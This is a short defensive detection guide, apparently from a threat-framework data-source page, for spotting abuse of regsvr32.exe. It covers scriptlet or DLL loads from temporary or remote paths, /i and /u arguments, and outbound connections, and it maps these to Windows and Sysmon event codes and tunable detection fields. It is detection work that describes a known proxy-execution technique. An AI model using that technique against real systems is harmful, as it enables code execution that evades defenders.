Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Field | Description |
|---|---|
| AllowedDLLPaths | Directories where DLL loading via regsvr32.exe is expected (e.g., C:\Windows\System32). |
| ScriptletExtensions | File extensions considered suspicious when executed by regsvr32.exe (e.g., .sct, .ocx). |
| TimeWindow | Timeframe to correlate regsvr32.exe process creation with subsequent module loads and network connections. |
| ParentProcessWhitelist | Parent processes from which regsvr32.exe is expected (e.g., explorer.exe during legitimate COM object registration). |